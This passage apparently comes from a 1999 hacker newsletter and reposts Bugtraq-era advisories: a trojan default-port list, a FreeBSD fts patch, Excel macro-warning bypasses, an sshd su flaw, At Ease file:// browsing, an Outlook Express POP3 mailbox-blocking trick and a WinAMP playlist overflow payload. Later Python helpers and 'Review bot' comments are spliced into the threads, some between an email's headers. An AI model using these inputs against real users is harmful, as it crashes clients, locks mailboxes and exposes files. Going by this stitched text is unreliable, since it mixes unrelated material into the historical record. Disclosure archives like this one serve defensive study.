port 1170 - Psyber Stream Server, Voice
port 1234 - Ultors Trojan
port 1245 - VooDoo Doll
port 1492 - FTP99CMP
port 1600 - Shivka-Burka
port 1807 - SpySender
port 1981 - Shockrave
port 1999 - BackDoor
port 2001 - Trojan Cow
port 2023 - Ripper
port 2115 - Bugs
port 2140 - Deep Throat, The Invasor
port 2801 - Phineas Phucker
port 3024 - WinCrash
port 3129 - Masters Paradise
port 3150 - Deep Throat, The Invasor
port 3700 - Portal of Doom
port 4092 - WinCrash
port 4590 - ICQTrojan
port 5000 - Sockets de Troie
port 5001 - Sockets de Troie
port 5321 - Firehotcker
port 5400 - Blade Runner
port 5401 - Blade Runner
port 5402 - Blade Runner
port 5569 - Robo-Hack
port 5742 - WinCrash
port 6670 - DeepThroat
port 6771 - DeepThroat
port 6969 - GateCrasher, Priority
port 7000 - Remote Grab
port 7300 - NetMonitor
port 7301 - NetMonitor
port 7306 - NetMonitor
port 7307 - NetMonitor
port 7308 - NetMonitor
port 7789 - ICKiller
port 9872 - Portal of Doom
port 9873 - Portal of Doom
port 9874 - Portal of Doom
port 9875 - Portal of Doom
port 9989 - iNi-Killer
port 10067 - Portal of Doom
port 10167 - Portal of Doom
port 11000 - Senna Spy
port 11223 - Progenic trojan
port 12223 - Hack'99 KeyLogger
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 12361 - Whack-a-mole
port 12362 - Whack-a-mole
port 16969 - Priority
port 20001 - Millennium
port 20034 - NetBus 2 Pro
port 21544 - GirlFriend
port 22222 - Prosiak
port 23456 - Evil FTP, Ugly FTP
port 26274 - Delta
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
port 31339 - NetSpy DK
port 31666 - BOWhack
port 33333 - Prosiak
port 34324 - BigGluck, TN
port 40412 - The Spy
port 40421 - Masters Paradise
port 40422 - Masters Paradise
port 40423 - Masters Paradise
port 40426 - Masters Paradise
port 47262 - Delta
port 50505 - Sockets de Troie
port 50766 - Fore
port 53001 - Remote Windows Shutdown
port 61466 - Telecommando
port 65000 - Devil

You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future).

To help anyone to detect trojan attacks, I'm planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance.

Feel free to get back to me with any comments or suggestions. If you find new trojans I'd love to get my hands on them, but please mail me first, as I don't need more than one copy. If you have live experience of trojan attacks I'm interested to read about your findings.
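A small check that uses the list above the way its author intends, as an added example that is not part of the original post: it parses entries in the "port N - name, name" form into a table and flags only local listening sockets whose port appears in it, ignoring the remote side of established connections. The list excerpt and the netstat-style output are constructed samples, and the function names belong to this example.

```python
"""Flag local listeners on ports from a 'port N - name, name' trojan list.

Added example, not part of the original post. A port match is only a hint:
as the author says, most of these programs can be told to use any port, and
several defaults collide with ordinary services (21, 23, 25, 80), so treat a
hit as something to investigate, not as proof.
"""
import re

# Constructed excerpt in the same format as the list above.
TROJAN_LIST = """\
port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
port 80 - Executor
port 12345 - GabanBus, NetBus
port 12346 - GabanBus, NetBus
port 20034 - NetBus 2 Pro
port 31337 - Back Orifice
port 31338 - Back Orifice, DeepBO
"""

# Constructed 'netstat -an' style output for a Windows host.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:1043      10.0.0.5:80            ESTABLISHED
  TCP    192.168.1.10:1044      10.0.0.7:31337         ESTABLISHED
  UDP    0.0.0.0:31337          *:*
"""

_LIST_LINE = re.compile(r"^port\s+(\d+)\s*-\s*(.+?)\s*$")


def parse_port_list(text):
    """Turn 'port N - name, name' lines into {port: [names]}; other lines are skipped."""
    table = {}
    for line in text.splitlines():
        m = _LIST_LINE.match(line.strip())
        if not m:
            continue
        names = [n.strip() for n in m.group(2).split(",") if n.strip()]
        table.setdefault(int(m.group(1)), []).extend(names)
    return table


def local_listeners(netstat_text):
    """Return [(proto, local_port)] for sockets this host is listening on.
    TCP lines count only in LISTENING state; UDP sockets are always bound,
    so every UDP line counts. Foreign-address ports are ignored on purpose:
    an outbound connection to a remote port 80 or 31337 is not a local listener."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        state = parts[3] if len(parts) > 3 else ""
        if proto == "TCP" and state != "LISTENING":
            continue
        found.append((proto, int(local.rsplit(":", 1)[1])))
    return found


def flag_listeners(netstat_text, table):
    """Return sorted [(proto, port, [trojan names])] for listeners on listed ports."""
    hits = [(proto, port, table[port])
            for proto, port in local_listeners(netstat_text) if port in table]
    return sorted(hits, key=lambda h: (h[1], h[0]))


if __name__ == "__main__":
    for proto, port, names in flag_listeners(NETSTAT_SAMPLE, parse_port_list(TROJAN_LIST)):
        print(f"{proto} port {port} is listening; default port of: {', '.join(names)}")
```

Run against the sample it reports the TCP listener on 12345 and the UDP socket on 31337, but not the established connection whose remote end is 31337, which is the distinction a quick grep of netstat output tends to blur.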
Joakim
joakim.von.braun@risab.se

@HWA

20.0 Fts_read vulnerability provides root compromise in FreeBSD find, du
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 14:32:42 +0400
From: Stas Kisel
To: BUGTRAQ@netspace.org
Subject: fts, du, find

Hi.

I use FreeBSD-2.2.8 and FreeBSD-2.2.7 and I know that these versions are no longer supported, but:

1. There are many people still using 2.2
2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.

Approximately a month ago I found a very strange behaviour of 'du' with long directory structures. I left this alone due to lack of time, but some days ago I saw an article on bugtraq concerning similar behaviour of 'find'. There is one bug in libc causing this behaviour. I have a patch, but I did not test it much ;)

Both 'find' and 'du' use 'fts' (fts_read,...) functions to traverse the directory structure. fts uses realloc() to reallocate memory in quite complex lists. There is a bug in adjusting pointers after realloc(). So when dealing with large directory structures (when realloc() is needed), some pointers can point to free()-ed memory.

I have no exploit and probably will not have free time (I think 3 days is more than enough) for doing it, but I believe it is possible to exploit this bug using a carefully designed directory tree to execute arbitrary commands as root during /etc/daily->/etc/security->find.

REMOTE ROOT EXPLOIT (POSSIBLE).

At least it is possible to hide a setuid binary this way in a home dir or in /tmp.

The following patch is designed for FreeBSD-2.2.8-RELEASE libc. There was the following ID in the beginning of the source file.

/* $OpenBSD: fts.c,v 1.9 1997/08/02 00:13:49 millert Exp $ */

I've only tested this patch on one machine during one day, so it is probably buggy. If you apply this patch, please drop me a line if there was any side effect and I'll do a followup in the bugtraq, say, on the Friday.

------------------ patch ----------------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999 +++ /usr/src/lib/libc/gen/fts.c Wed May 12 13:16:08 1999
@@ -740,8 +740,26 @@ * If had to realloc the path, adjust the addresses for the rest * of the tree. */ - if (adjaddr) + if (adjaddr){ fts_padjust(sp, adjaddr); + /* Adjust the list, because we want to return it robust. */ +/* fix p->fts_path and p->fts_accpath + p->fts_accpath can be: + either cur->fts_path (adjust, because cur is already adjusted) + either p->fts_path (adjust) + either p->fts_name (do not adjust) + I'm also almost sure that in first case cur->fts_path=p->fts_path... +*/ +#define ADJUST1(p) if((p)->fts_path != adjaddr){ \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\ + } \ + (p)->fts_path = adjaddr; \ +} + for (p = head; p; p = p->fts_link) + ADJUST1(p); + } /* * If not changing directories, reset the path back to original @@ -974,18 +992,18 @@ { FTSENT *p; -#define ADJUST(p) { \ +#define ADJUST2(p) { \ (p)->fts_accpath = \ (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ (p)->fts_path = addr; \ } /* Adjust the current set of children. */ for (p = sp->fts_child; p; p = p->fts_link) - ADJUST(p); + ADJUST2(p); /* Adjust the rest of the tree. */ for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) { - ADJUST(p); + ADJUST2(p); p = p->fts_link ? p->fts_link : p->fts_parent; } } ------------------ endpatch ---------------------------------------- -- Stas Kisel Open Tavrical College Sysadmin stas@sonet.crimea.ua Simferopol State University Web-designer stas@ccssu.crimea.ua ------------------------------------------------------------------------------------------ Date: Fri, 14 May 1999 04:33:34 -0400 
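Review bot: the ADJUST2 macro in the second hunk (fts_padjust) still rebases fts_accpath unconditionally, while ADJUST1 in the first hunk deliberately skips entries whose fts_accpath points at fts_name (storage inside the FTSENT, not inside the realloc()ed path buffer); applying the unconditional rebase to such an entry yields `(char *)addr + (fts_name - fts_path)`, a pointer into the path buffer at a meaningless offset, so ADJUST2 should carry the same `if((p)->fts_accpath != (p)->fts_name)` guard. The first hunk's comment also ships an unverified assumption ("I'm also almost sure that in first case cur->fts_path=p->fts_path..."); ADJUST1's arithmetic depends on it, so please confirm it before this goes in, and note that both `#define`s are introduced inside function bodies without a matching `#undef`.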
From: Jordan Ritter
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find

On Wed, 12 May 1999, Stas Kisel wrote:

> 2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.

I found this back a few months ago when working on the wu-ftp stuff.. OpenBSD definitely has the same problem. last thing I remember thinking was that it was dying because realloc() was failing (as the fts stuff realloc()'s memory as the path grows) ..

Jordan Ritter
Network Security Engineer
Netect/Bindview Corp
Boston, MA

"Quis custodiet ipsos custodes?"

------------------------------------------------------------------------------------------

Date: Fri, 14 May 1999 14:37:03 +0400
From: Stas Kisel
To: BUGTRAQ@netspace.org
Subject: Re: fts...(improved patch)

> From: Jordan Ritter
> OpenBSD definitely has the same problem. last thing I remember thinking
> was that it was dying because realloc() was failing (as the fts stuff
> realloc()'s memory as the path grows) ..

fts reallocs (pathlen+~1000b) of memory only, so realloc succeeds. The bug is in adjusting the pointers after realloc().

The day after sending the patch I found other circumstances that triggered a similar bug in fts. This time some pointers were adjusted which did not belong to the realloc()-ed memory chunk. The improved patch is below. Sorry for the inconvenience.

Probably there are some similar bugs in the fts code or patch. Please let me know if you see any.

\bye
Stas

----------------------------- patch ----------------------------------
--- /usr/src/lib/libc/gen/fts.c.orig Tue May 11 13:37:49 1999 +++ /usr/src/lib/libc/gen/fts.c Fri May 14 14:02:58 1999
@@ -740,8 +740,26 @@ * If had to realloc the path, adjust the addresses for the rest * of the tree. */ - if (adjaddr) + if (adjaddr){ fts_padjust(sp, adjaddr); + /* Adjust the list, because we want to return it robust. */ +/* fix p->fts_path and p->fts_accpath + p->fts_accpath can be: + either cur->fts_path (adjust, because cur is already adjusted) + either p->fts_path (adjust) + either p->fts_name (do not adjust) + I'm also almost sure that in first case cur->fts_path=p->fts_path... +*/ +#define ADJUST1(p) if((p)->fts_path != adjaddr){ \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)adjaddr + ((p)->fts_accpath - (p)->fts_path);\ + } \ + (p)->fts_path = adjaddr; \ +} + for (p = head; p; p = p->fts_link) + ADJUST1(p); + } /* * If not changing directories, reset the path back to original @@ -974,18 +992,20 @@ { FTSENT *p; -#define ADJUST(p) { \ - (p)->fts_accpath = \ - (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ +#define ADJUST2(p) { \ + if((p)->fts_accpath != (p)->fts_name){ \ + (p)->fts_accpath = \ + (char *)addr + ((p)->fts_accpath - (p)->fts_path); \ + } \ (p)->fts_path = addr; \ } /* Adjust the current set of children. */ for (p = sp->fts_child; p; p = p->fts_link) - ADJUST(p); + ADJUST2(p); /* Adjust the rest of the tree. */ for (p = sp->fts_cur; p->fts_level >= FTS_ROOTLEVEL;) { - ADJUST(p); + ADJUST2(p); p = p->fts_link ? p->fts_link : p->fts_parent; } } ----------------------------- /patch ---------------------------------- ------------------------------------------------------------------------------------------ Date: Fri, 14 May 1999 19:14:02 +0200 
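Review bot: the guard added to ADJUST2 in the second hunk now matches ADJUST1 in the first, which resolves the inconsistency of the earlier version; what is still undocumented is that both macros compute `(p)->fts_accpath - (p)->fts_path` from pointers into a buffer realloc() has already released, the same stale-pointer arithmetic the original fts_padjust performed. It works because only the difference between the two old pointers is used, never the pointers themselves, but a one-line comment should say so, and ADJUST1's `(p)->fts_path != adjaddr` test (skip entries already rebased) has no counterpart in ADJUST2, so an entry reachable from both the `head` list walk and the fts_padjust walk would be rebased twice; please state why that cannot happen or add the same test.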
From: Przemyslaw Frasunek
Reply-To: venglin@lagoon.freebsd.org.pl
To: BUGTRAQ@netspace.org
Subject: Re: fts, du, find

> 2. This bug probably applies to FreeBSD-3.1 and even to OpenBSD and others.

Yes, I've tested it on 3.1-STABLE.

> I have no exploit and probably will not have free time (I think
> 3 days is more than enough) for doing it, but I believe it is
> possible to exploit this bug using a carefully designed directory
> tree to execute arbitrary commands as root during
> /etc/daily->/etc/security->find.
> REMOTE ROOT EXPLOIT (POSSIBLE).

I think that it will be hard to write an exploit. I've tested it on my 2.2.8-RELEASE at home. 'Find' segfaults when it tries to do:

(void)puts(entry->fts_path);

because of a junk pointer to structure 'entry'. IMHO it _always_ points to 0x200291d6, so it tries to execute (IMHO) _always_ the same commands:

0x200291d6 : repnz scasb %es:(%edi),%al
0x200291d7 : scasb %es:(%edi),%al
0x200291d8 : movl %ecx,%eax
0x200291d9 : enter $0xd0f7,$0x89
0x200291da : notl %eax
0x200291db : rorb 0x488de455(%ecx)
0x200291dc : movl %edx,0xffffffe4(%ebp)
0x200291dd : pushl %ebp
0x200291de : inb $0x8d,%al
0x200291df : leal 0xffffffff(%eax),%ecx
0x200291e0 : decl %eax
0x200291e1 : decl 0x938de84d(%ecx)
0x200291e2 : movl %ecx,0xffffffe8(%ebp)
0x200291e3 : decl %ebp
0x200291e4 : call 0xc1532576

and here it segfaults.

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *

@HWA

21.0 Excel Macro Virus protection patch has a hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 13 May 1999 16:12:48 -0400
From: rotaiv
To: BUGTRAQ@netspace.org
Subject: Re: Microsoft Security Bulletin (MS99-014)

-----BEGIN PGP SIGNED MESSAGE-----

This is in response to the Microsoft Security Bulletin (MS99-014). On 3/29/99 I posted a message to BugTraq titled, "Bypassing Excel Macro Virus Protection". The message explained two ways to bypass the "Macro Virus Protection" option in Excel 97. One is to password protect an infected spreadsheet (Q176640) and the second is to copy an infected spreadsheet into the XLSTART directory (Q180614). Both methods will open an infected spreadsheet without the macro warning appearing.

I would love to think Microsoft Security Bulletin (MS99-014) was in response to my email but I'll be humble and chalk it up to coincidence. I downloaded the patch to see if it addressed the two scenarios I described above. I found that you will now receive the macro warning on a password protected file but not on a file copied to the XLSTART directory. Also, you can still enable or disable the macro virus protection with a simple reg hack. I guess that is not so important because if you can perform a reg hack, you can do a lot more than execute an Excel macro.

I am not sure what really prompted Microsoft to release a patch for Excel but I find it surprising that they did not address the XLSTART option either. They should at least give us the option of deciding if this directory is trusted, thereby by-passing the macro virus warning.

'nuff said.
rotaiv

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2

iQEVAwUBNzsxdQuGSvRTfa2rAQHe+Af+NXzCRMZ6ALIsiezLQ5XhOuBgmRZALeoO
k2LMkGfVea8jO7olA/wtwnrS2E0eCUVSMW23ZSxkd8Q9hbYBxbc8GvPOzOTGL4EP
tmZkyvxcB2QyyDmJjIQuJQKcGCggr0ahPNr9pvv9DsBHJeRifcS6niXZrm5uQJb7
qhY4QJzAWQ9cXEiqoNuTofgR1eg276MUSuh2Om29FIjkfcMocdGghrkQLBGvN9MB
Hlm9Z7D0I3/zT88c+A6IeyZHbe9/6PaAODgn3QuhKla8PbetyGj/Qbclua5kNR/X
tVoLWIIrcA2ZKsgQn1SLtcKTqDV5KPTGrz3yB1ZH9BJ37qmXLOegfw==
=qJ15
-----END PGP SIGNATURE-----

@HWA

22.0 Possible root compromise when installing new SSHD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 10 May 1999 22:26:19 +0200
From: "GWDVMS::MOELLER"
Subject: Risks of upgrading a UNIX system

When was the last time you rebuilt all privileged (`suid root') applications when upgrading a unix system, just in case? I'm pretty sure one can find `small print' that demands this, however I'm equally sure that hardly any system manager does so, since problems seem to occur _very_ rarely. Here's a neat one:

Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a not-so-common platform (nothing really security-relevant, machine used for raw speed only, users just being accustomed to that sort of login). Said platform (featuring a particularly elaborate user data base) requires some special calls (simple calling sequences) to be done during `login' - no problem, `sshd' knows about them, although not explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not allow `root' logins from the outside. What other harm could it possibly do?

Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but procedures are known well enough. S.M. asks the manufacturer's support representative if special precautions have to be taken, "errr, not that I'd think so". S.M. installs new version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to work the same as before.

A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters `su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for a password. Minutes later, S.M. recognizes that `su' would never ask for a password, when the parent process had been created via `sshd' ... in spite of no other visible peculiarities with that process.

A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the problem.
Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a bank, you don't buy your safe at a flea market; if you're not, you might be better off without a safe". Maybe there's _some_ truth in it, after all.

Dr. Wolfgang J. "s."Moeller, Tel. +49 551 2011510, GWDG, D-37077 Goettingen, F.R.Germany

P.S. re "software bloat": Imagine uSoft going open source, and no-one going to have a look at it...

[from Risks Digest 20.39]

@HWA

23.0 Apple's AtEase 5.0 security hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 13 May 1999 09:37:57 -0600
From: Tim Conrad
To: BUGTRAQ@netspace.org
Subject: At Ease 5.0 Security Hole

Hello;

At Ease 5.0 will allow a user to access any user's volume on the server. The tested configuration is as follows:

MacOS 7.6.1 (should work with anything greater than 7)
At Ease 5.0.2
AppleShare IP 5.0.3
Netscape 4.0.7 (No reason it shouldn't work from .99 to 4.5)

How to do it.

Log in as any user that has access to Netscape Communicator, and type in file://Macintosh%20HD/System%20Folder/ and you are able to access the disk. Do the same thing, except use file://At%20Ease%20Volume%20Name/At%20Ease%20%Docs/username and it's quite easy to browse through anyone's files. It is possible to download files from that user's directory. I have been unable to actually open any of the files once they are downloaded, however in an educational setting, just viewing names in a certain directory could constitute some serious problems (such as if a teacher works with Special Education students, and has a list of documents to their parents).

Apple apparently will not fix their own product. There is a 3rd party extension available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx

Tim Conrad

---------------------------------------------------------------------------------

Date: Fri, 14 May 1999 18:48:37 -0700
From: Vincent Janelle
To: BUGTRAQ@netspace.org
Subject: Re: At Ease 5.0 Security Hole

This is not an apple problem mostly, it's an MSIE problem. Hell, is At Ease still supported? It's just a replacement finder as far as I know, it doesn't do things like replace fs drivers and patch binaries to stop things like that.

------------
If you have any trouble sounding condescending, find a Unix user to show you how it's done. -Scott Adams
--http://random.gimp.org
--mailto:random@gimp.org
--UIN 23939474

On Thu, 13 May 1999, Tim Conrad wrote:

> Apple apparently will not fix their own product. There is a 3rd party extension
> available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx
>
> Tim Conrad

@HWA

24.0 Bug in Microsoft Outlook Express
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Outlook Express Win98 bug
Miquel van Smoorenburg (miquels@CISTRON.NL)
Tue, 11 May 1999 10:58:41 +0200

There is a bug in Outlook Express delivered with Windows '98, at least version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1). Windows '95 updated with MSIE 4.01 has Outlook Express 4.72.3612.1700, which doesn't show the problem. OE from MSIE3 and MSIE5 don't have the problem either. There might be versions of MSIE4 included with Windows '98 that don't show the problem either, but I don't have a stack of Windows CDs to test against.

We have talked to Microsoft NL about this, tracking number S2134 T6142. However they either deny there is a bug ("sorry sir, this product has been available for a year now so there cannot be any bugs in it") or they do not understand what we are talking about. They also claim to have not received any mail we sent to them, so I am giving up on that. We did send them this bug report by fax, perhaps that technology is stable enough to work for them, I don't know.

Description of the problem:

A dot on a single line means EOM in the POP3 protocol.
If a message contains that it must be escaped by adding an extra dot, so we have 2 dots on a single line - which is OK. However if on the TCP level the line after this double-dot crosses over to the next packet, Outlook Express will interpret the double-dot as a single dot, switching back to POP3 command mode and interpreting the rest of the message as a response from the POP3 server. Result is an error message and usually a hanging POP3 session. Perhaps it's not really a bug in Outlook, but the Windows I/O library or the TCP implementation.. which is scary.

So at the TCP packet level it looks like this:

packet1: [message data]
packet1: \r\n..\r\nthis is a line that
packet2: continues in the next packet

The double-dot on the 2nd line will be interpreted as a single dot. Include a few thousand lines like this in an email and the bug will trigger:

So
.
this
.
might
.
actually
.
cause
.
the
.
bug
.
with
.
some
.
luck
.
repeat
.
until
.
three
.
times
.
max
.
mtu
.
of
.
1500

Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?

------------------------------------------------------------------------------

Outlook Express Win98 bug, addition.
Miquel van Smoorenburg (miquels@CISTRON.NL)
Wed, 12 May 1999 10:59:46 +0200

In article , Miquel van Smoorenburg wrote:
>There is a bug in Outlook Express delivered with Windows '98, at least
>version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1)
[...]
>Outlook
>Express will interpret the double-dot as a single dot, switching back to
>POP3 command mode and interpreting the rest of the message as a response
>from the POP3 server. Result is an error message and usually a hanging
>POP3 session.

It occurred to me that it might not be clear from the original message but because the POP3 session is hanging, the message will not be removed from the server and the next time mail is checked the same thing will occur. This is an effective DOS attack against the mailbox.
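The dot-stuffing rule and the segmentation case described above, as an added example not taken from the original posts: a POP3 RETR reader that only classifies complete CRLF-terminated lines, so a segment boundary after the ".." line cannot be misread, a server-side stuffing routine to generate test input, and the "line starting with a dot" search the addition suggests to sysadmins. The message body and the function names are constructed for this example.

```python
"""POP3 multi-line response handling that is immune to TCP segmentation.

Added example, not part of the original posts. `stuff_message` plays the
server (RFC 1939 byte-stuffing), `RetrReader` plays a client that never
decides anything on a partial line, and `find_dot_lines` is the check a
mail administrator can run to locate a message that keeps wedging a client.
"""

CRLF = b"\r\n"


def stuff_message(body: bytes) -> bytes:
    """Server side: a line beginning with '.' is sent with an extra leading
    '.', and the response ends with a line holding a lone '.'.
    `body` is CRLF-terminated text (or empty)."""
    if not body:
        return b"." + CRLF
    if not body.endswith(CRLF):
        raise ValueError("body must be CRLF-terminated")
    stuffed = CRLF.join(b"." + l if l.startswith(b".") else l
                        for l in body.split(CRLF))
    return stuffed + b"." + CRLF


class RetrReader:
    """Client side. Bytes are buffered until a whole CRLF-terminated line is
    present; only then is the line classified (terminator, stuffed, plain).
    Because no decision looks at a partial line, where the TCP segments fall,
    including right after the '..' line in the post, cannot change the result."""

    def __init__(self):
        self._buf = b""
        self._lines = []
        self.done = False

    def feed(self, chunk: bytes) -> None:
        if self.done and chunk:
            raise ValueError("data after end-of-message terminator")
        self._buf += chunk
        while not self.done:
            cut = self._buf.find(CRLF)
            if cut < 0:
                return                        # wait for the rest of the line
            line, self._buf = self._buf[:cut], self._buf[cut + 2:]
            if line == b".":
                self.done = True              # lone dot: end of message
            elif line.startswith(b"."):
                self._lines.append(line[1:])  # un-stuff the escaped line
            else:
                self._lines.append(line)

    def body(self) -> bytes:
        if not self.done:
            raise ValueError("response incomplete")
        return b"".join(l + CRLF for l in self._lines)


def find_dot_lines(raw_message: bytes):
    """Admin side: 1-based numbers of lines that start with a dot, i.e. the
    lines the server has to stuff and the ones to look for on the server
    when a mailbox is stuck."""
    return [i for i, l in enumerate(raw_message.split(CRLF), 1) if l.startswith(b".")]


def survives_any_split(stuffed: bytes, expected_body: bytes) -> bool:
    """Deliver `stuffed` as two segments cut at every byte offset and confirm
    the reader reconstructs the same body every time."""
    for cut in range(len(stuffed) + 1):
        r = RetrReader()
        r.feed(stuffed[:cut])
        r.feed(stuffed[cut:])
        if r.body() != expected_body:
            return False
    return True


# Constructed sample in the shape the post describes: text lines alternating
# with lone-dot lines, which the server must send as '..'.
SAMPLE_BODY = CRLF.join([b"So", b".", b"this", b".", b"might", b".", b"actually", b""])

if __name__ == "__main__":
    wire = stuff_message(SAMPLE_BODY)
    print("stuffed lines with a dot:", find_dot_lines(SAMPLE_BODY))
    print("robust to every segment boundary:", survives_any_split(wire, SAMPLE_BODY))
```

The reader's invariant is the whole point: the classification of a line (terminator, stuffed or plain) is made exactly once, on the complete line, so the ".." case that tripped the client in the post is handled identically whether or not a packet boundary follows it.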
The only way to solve this is to remove the message with another POP3 email program (Eudora, Pegasus) or to ask the sysadmin of the POP3 server to remove the message manually (look for a message that has a line starting with a dot). Upgrading to MSIE 5.0 will also solve the problem, but there is no simple/small bugfix from Microsoft available (an MSIE 5.0 download is what - 20 MB at least?) yet for as far as I know.

So, ISP helpdesks - take note. This is at least one of the causes of the problems all these people have been having with their "blocked mail".

Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?

@HWA

25.0 Trivial buffer overflow DoS on WinAMP 2.x
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 12 May 1999 13:02:43 +0200
From: Wojtek Kaniewski
To: BUGTRAQ@netspace.org
Subject: Buffer overflow in WinAMP 2.x

Introduction
------------

WinAMP is a popular Windows sound player with support for many file formats (MP3, wave files, modules). It also supports MP3 streaming (let's call it sh0utcast).

Description of the problem
--------------------------

If we tell WinAMP to open a file location (Ctrl+L) which is over 256 bytes long, it'll produce a nice GPF. The bug also appears when loading playlists (.m3u and .pls).

What can we do with this bug?
-----------------------------

Many sh0utcast radios place .pls files on their websites, which contain the URL for the radio's sh0utcast server. If we make a b00m.pls file like this...

[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (about 256 A's)

and put such a link...

Techno explosion -- The Coolest MP3 Radio

on our website, we can make a couple of WinAMPs crash. I suppose that there's a possibility to put our own code in the filename (see cDc-351 for details). Nullsoft (producer of WinAMP) has been notified about the bug two versions ago.

--
wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@ircnet

-----------------------------------------------------------------------

Date: Fri, 14 May 1999 15:56:28 -0400
From: William Yodlowsky
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x

Tested on WinAMP v2.091 on Win95A and Win95B; v2.21 on Win98; v1.9? and v2.21 on WinNT 4.0WS

It produced GPFs on all except WinNT, where it opened but simply didn't play.

--Bill

On Wed, 12 May 1999, Wojtek Kaniewski wrote:

-----------------------------------------------------------------------

Date: Mon, 17 May 1999 03:40:48 +0100
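A bounded .pls reader as an added example (not Nullsoft code), showing the defensive counterpart of the report above: entries longer than a fixed limit, non-printable entries and unexpected URL schemes are reported and dropped instead of being copied into a fixed-size buffer. MAX_ENTRY_LEN, the allowed scheme set and the sample playlists are assumptions constructed for this example.

```python
"""Bounded .pls playlist reader (added example, not Nullsoft code)."""
import re

MAX_ENTRY_LEN = 255                  # assumed limit; the post says >256 bytes crashed WinAMP 2.x
ALLOWED_SCHEMES = {"http", "file"}   # assumed policy; bare paths and drive letters pass too
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.-]*):")


def parse_pls(text: str, max_entry_len: int = MAX_ENTRY_LEN):
    """Return (entries, problems): accepted File<N> values in playlist order,
    and one message per rejected or malformed item. Nothing reaches the
    caller unchecked, which is the property the crash above was missing."""
    entries, problems = [], []
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if not lines or lines[0].lower() != "[playlist]":
        return entries, ["missing [playlist] header"]

    kv = {}
    for ln in lines[1:]:
        key, sep, value = ln.partition("=")
        if not sep:
            problems.append(f"malformed line: {ln[:40]!r}")
            continue
        kv[key.strip().lower()] = value.strip()

    try:
        count = int(kv.get("numberofentries", "0"))
    except ValueError:
        problems.append("NumberOfEntries is not a number")
        return entries, problems

    for n in range(1, count + 1):
        value = kv.get(f"file{n}")
        if value is None:
            problems.append(f"File{n} missing")
            continue
        if len(value.encode("utf-8")) > max_entry_len:
            problems.append(f"File{n} too long ({len(value)} chars > {max_entry_len})")
            continue
        if not value.isprintable():
            problems.append(f"File{n} contains control characters")
            continue
        m = _SCHEME.match(value)
        scheme = m.group(1).lower() if m else ""
        if len(scheme) == 1:          # 'C:' style Windows drive letter, not a URL scheme
            scheme = ""
        if scheme and scheme not in ALLOWED_SCHEMES:
            problems.append(f"File{n} has disallowed scheme {scheme!r}")
            continue
        entries.append(value)
    return entries, problems


# Constructed samples: a normal playlist and one with an oversized entry.
GOOD_PLS = """[playlist]
NumberOfEntries=2
File1=http://radio.example.net:8000/
Title1=Techno explosion
File2=C:\\Music\\track01.mp3
Version=2
"""
BAD_PLS = "[playlist]\nNumberOfEntries=1\nFile1=" + "A" * 300 + "\n"

if __name__ == "__main__":
    print(parse_pls(GOOD_PLS))
    print(parse_pls(BAD_PLS))
```

The limit is enforced on the encoded byte length rather than the character count, since a fixed-size buffer overflows on bytes, and the reader reports each bad entry separately so a log of what was rejected survives the parse.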
From: Jello Biafra
